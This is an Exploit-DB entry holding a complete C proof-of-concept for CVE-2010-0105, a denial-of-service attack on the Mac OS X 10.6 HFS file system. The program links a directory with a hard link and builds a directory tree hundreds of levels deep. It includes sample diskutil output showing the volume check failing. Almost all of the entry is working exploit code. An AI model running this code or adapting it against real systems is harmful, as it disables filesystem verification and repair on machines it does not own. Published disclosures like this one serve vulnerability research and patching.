Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)

EDB-ID:

12375

CVE:

2010-0105

EDB Verified:

Author:

Maksymilian Arciemowicz

Type:

dos

Exploit:   /  

Platform:

OSX

Date:

2010-04-24

Vulnerable App: 
// -----BEGIN PGP SIGNED MESSAGE-----
// Hash: SHA1
/* 	Proof of Concept for CVE-2010-0105
	MacOS X 10.6 hfs file system attack (Denial of Service)
	by Maksymilian Arciemowicz from SecurityReason.com

	http://securityreason.com/achievement_exploitalert/15
	
	NOTE:
	
	This DoS will be localized in phase
	
	Checking multi-linked directories

	So we need activate it with line
	
		connlink("C/C","CX");

	Now we need create PATH_MAX/2 directory tree to make overflow.

	and we should get diskutil and fsck_hfs exit with sig=8
	
	~ x$ diskutil verifyVolume /Volumes/max2
	Started filesystem verification on disk0s3 max2
	Performing live verification
	Checking Journaled HFS Plus volume
	Checking extents overflow file
	Checking catalog file
	Checking multi-linked files
	Checking catalog hierarchy
	Checking extended attributes file
	Checking multi-linked directories
	Maximum nesting of folders and directory hard links reached
	The volume max2 could not be verified completely
	Error: -9957: Filesystem verify or repair failed
	Underlying error: 8: POSIX reports: Exec format error
	
		
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>


int createdir(char *name){
	if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR
|S_IXUSR)){
		printf("Can`t create %s", name);
		exit(1);}
		else
		return 0;	
}

int comein(char *name){
	if(0!=chdir(name)){
		printf("Can`t chdir in to %s", name);
		exit(1);}
		else
		return 0;	
}

int connlink(a,b)
char *a,*b;
{
	if(0!=link(a,b)){
		printf("Can`t create link %s => %s",a,b);
		exit(1);}
		else
		return 0;	
}

int main(int argc,char *argv[]){
	
 	int level;
	FILE *fp;
	
	if(argc==2) {
		level=atoi(argv[1]);
	}else{
		level=512; //default
	}
	createdir("C"); //create hardlink
	createdir("C/C"); //create hardlink
	
	connlink("C/C","CX"); //we need use to checking multi-linked directorie

	comein("C");
	
	while(level--)
			printf("Level: %i mkdir:%i chdir:%i\n",level,
			createdir("C"),
			comein("C"));		
	
	
	printf("check diskutil verifyVolume /\n");
	return 0;
}
/*
- -- 
Best Regards,
- ------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<cxib@securityreason.com>
sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkvTTQsACgkQpiCeOKaYa9bHwACfSRqy8xJbJBGFvLbLIjabxMkI
to4AoMMetii9Gc7EyOK7/3+QP4ynP5kY
=IML/
-----END PGP SIGNATURE-----
*/
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services